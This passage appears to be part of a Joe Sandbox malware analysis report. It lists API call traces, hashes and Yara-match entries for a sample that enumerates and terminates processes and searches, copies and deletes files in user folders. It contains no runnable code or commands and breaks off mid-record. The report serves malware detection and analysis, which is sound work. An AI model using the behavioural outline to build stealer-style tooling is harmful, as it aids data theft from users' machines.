                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 396451647-0
                                                                                  • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                                                  • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                                                  • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                                                  • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00B19752
                                                                                    • Part of subcall function 00B18FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B19785,00000000), ref: 00B18FC2
                                                                                    • Part of subcall function 00B18FB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B18FC9
                                                                                    • Part of subcall function 00B18FB7: wsprintfW.USER32 ref: 00B18FDF
                                                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00B19812
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B19830
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B1983D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3729781310-0
                                                                                  • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                                                  • Instruction ID: 2281eb7fb161ad504f4ea1e5fd4eca0d9b77fb03649c98ca8d05367887d27e38
                                                                                  • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                                                  • Instruction Fuzzy Hash: 943157B5E00248EFDB14DFE0CC49BEDB7B9EF49300F504498E506AB584DB74AA84CB52
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                                                  • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                                                  • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • CloseHandle.KERNEL32(?), ref: 00418761
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1066202413-0
                                                                                  • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                                                  • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                                                  • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                                                  • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 00B18931
                                                                                  • Process32First.KERNEL32(?,00000128), ref: 00B18945
                                                                                  • Process32Next.KERNEL32(?,00000128), ref: 00B1895A
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • CloseHandle.KERNEL32(?), ref: 00B189C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1066202413-0
                                                                                  • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                                                  • Instruction ID: 238bb5472b5b6e899d8958bed64170bddadf005cd937aaa549b42a350a3f3c3b
                                                                                  • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                                                  • Instruction Fuzzy Hash: 13313C71952218EBCB24DF94DD85FEEB7B8EF45700F5041D9A10AA21A0EB346E84CF92
                                                                                  APIs
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                                                  • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                                                  • lstrcatA.KERNEL32(?,009061A0), ref: 00414FAB
                                                                                  • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2667927680-0
                                                                                  • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                                                  • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                                                  • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                                                  • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                                                  • wsprintfA.USER32 ref: 00418850
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                  • String ID: %dx%d
                                                                                  • API String ID: 2716131235-2206825331
                                                                                  • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                                                  • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                                                  • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                                                  • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcessstrtok_s
                                                                                  • String ID:
                                                                                  • API String ID: 3407564107-0
                                                                                  • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                                                  • Instruction ID: 4e108242dfbc23b7f2453ceda49a85bc1f137fab845178d1804ed800bd8b26d0
                                                                                  • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                                                  • Instruction Fuzzy Hash: 0D116DB4911209EFCB04EFE4D948AEDBBB9FF04305F5084A9E90567250E7306B44CF95
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                                                  • wsprintfA.USER32 ref: 004179F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1243822799-0
                                                                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                  • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                  • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 00B17C17
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17C1E
                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 00B17C2B
                                                                                  • wsprintfA.USER32 ref: 00B17C5A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 377395780-0
                                                                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                  • Instruction ID: 4eb07865b04ca32aa09af3fd9851fcf224be196cf2300112b206bec34f8e7371
                                                                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                  • Instruction Fuzzy Hash: 4C1127B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10425AF605A2280D6395940CBB1
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00B17CCA
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17CD1
                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00B17CE4
                                                                                  • wsprintfA.USER32 ref: 00B17D1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3317088062-0
                                                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                  • Instruction ID: 857e87a84c0f4f728c9a58693c3e730f8ae189b4e71e2b29550c89fc6b420ef4
                                                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                  • Instruction Fuzzy Hash: 69115EB1A85218EFEB208B54DC49FA9B7B8FB05721F1043EAE51AA32C0C7745980CF51
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strtok_s
                                                                                  • String ID:
                                                                                  • API String ID: 3330995566-0
                                                                                  • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                                                  • Instruction ID: 277c88d27f528d561b9e86ae280ca53a4f5cced008fa49e86d96c64ef9561878
                                                                                  • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                                                  • Instruction Fuzzy Hash: 1511F5B4E00209EFDB14CFE6D988AEEB7F5FB08B05F50C029E025A6254E7B49641CF55
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00B13D55,80000000,00000003,00000000,00000003,00000080,00000000,?,00B13D55,?), ref: 00B19563
                                                                                  • GetFileSizeEx.KERNEL32(000000FF,00B13D55), ref: 00B19580
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00B1958E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID:
                                                                                  • API String ID: 1378416451-0
                                                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                  • Instruction ID: 7ff8145c02d1d8d145dd1bb9925acd624beb5ddbb5b7419f403ffab7a2ed46c3
                                                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                  • Instruction Fuzzy Hash: 77F06939E40208BBDB24DFA0DC59B9A77BAEB59310F508294AA11A7280D63596418B40
                                                                                  APIs
                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B16D31
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B16D4F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B16D60
                                                                                  • Sleep.KERNEL32(00001770), ref: 00B16D6B
                                                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B16D81
                                                                                  • ExitProcess.KERNEL32 ref: 00B16D89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                  • String ID:
                                                                                  • API String ID: 941982115-0
                                                                                  • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                                                  • Instruction ID: 888a70a5b36087e846cbb65c598b5dda120e191d5e7539b63c2a6e90e39ad1ef
                                                                                  • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                                                  • Instruction Fuzzy Hash: EAF0BE78A40605AEE710ABE0EC0ABFD33B5EF05305FA006B8F112A1190CBB05580CA56
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `o@
                                                                                  • API String ID: 0-590292170
                                                                                  • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                                                  • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                                                  • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                                                  • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                                                  APIs
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                                                                  • lstrcatA.KERNEL32(?,0090A270), ref: 00414C08
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00906250,?,000003E8), ref: 00414A4A
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                  • String ID: UaA
                                                                                  • API String ID: 2104210347-3893042857
                                                                                  • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                                                  • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                                                                  • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                                                  • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: SystemTimelstrcpy
                                                                                  • String ID: cI@$cI@
                                                                                  • API String ID: 62757014-1697673767
                                                                                  • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                                                  • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                                                  • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                                                  • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                                                  APIs
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                                                  • lstrcatA.KERNEL32(?,00909950), ref: 004150A8
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                  • String ID: aA
                                                                                  • API String ID: 2699682494-2567749500
                                                                                  • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                                                  • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
